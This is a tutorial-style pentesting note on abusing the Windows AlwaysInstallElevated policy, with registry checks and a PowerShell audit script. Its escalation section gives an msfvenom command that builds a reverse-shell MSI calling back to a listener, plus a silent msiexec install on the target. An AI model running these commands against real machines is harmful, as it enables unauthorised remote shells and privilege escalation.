# Always Install Elevated

### Overview

The **Always Install Elevated** policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts.

`AlwaysInstallElevated` is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the `AlwaysInstallElevated` registry value is set to `1`: with the setting enabled, non-administrator users can install software packages with elevated privileges.

### How it Works

1. **Elevation of Installations**: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.
2. **UAC Bypass**: Users do not see the standard UAC prompt, so they may not be aware of the risks associated with installing potentially harmful software.

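### Check if Vulnerable

Run the commands below and check whether they return `1` (shown as `0x1`). Windows Installer applies the policy only when the value is set to `1` in both the `HKLM` and `HKCU` keys.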

```bat
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
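
For auditing a host, the same check can be scripted so that it reads both hives, treats a missing key or value as "not configured", and flags the machine only when both are set. This is an added example, not code from the original page; the function name `Get-AlwaysInstallElevatedState` and its output shape are assumptions made for illustration.

```powershell
# Added example: audit AlwaysInstallElevated in both policy hives.
# Get-AlwaysInstallElevatedState is a hypothetical helper name.
function Get-AlwaysInstallElevatedState {
    $valueName = 'AlwaysInstallElevated'
    $paths = [ordered]@{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }

    $results = foreach ($hive in $paths.Keys) {
        # A missing key or value means the policy is not configured in that hive.
        $item = Get-ItemProperty -Path $paths[$hive] -Name $valueName -ErrorAction SilentlyContinue
        $data = if ($null -ne $item) { $item.$valueName } else { $null }
        [pscustomobject]@{
            Hive    = $hive
            Path    = $paths[$hive]
            Value   = $data
            Enabled = ($data -eq 1)
        }
    }

    # Windows Installer honours the policy only when both hives are set to 1.
    $enabledCount = @($results | Where-Object Enabled).Count
    [pscustomobject]@{
        Hives      = $results
        Vulnerable = ($enabledCount -eq 2)
        Partial    = ($enabledCount -eq 1)
    }
}

$state = Get-AlwaysInstallElevatedState
$state.Hives | Format-Table Hive, Value, Enabled -AutoSize
if ($state.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in HKLM and HKCU: MSI installs run elevated.'
} elseif ($state.Partial) {
    Write-Output 'Set in one hive only; the policy needs both. Remove the stray value.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled.'
}
```

`HKCU` is read for the account running the script, so run it in the context of the user being assessed.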

### Privilege Escalation Steps

1. **Generate the Malicious MSI Package**: \
   Use `msfvenom` to create a malicious MSI file that initiates a reverse shell connection back to the listener.

   ```bash
   msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi
   ```
2. Set up the listener and transfer the MSI file to the victim.
3. On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system.

   ```bat
   msiexec /i c:\users\user1\desktop\dbs.msi /quiet /qn /norestart
   ```



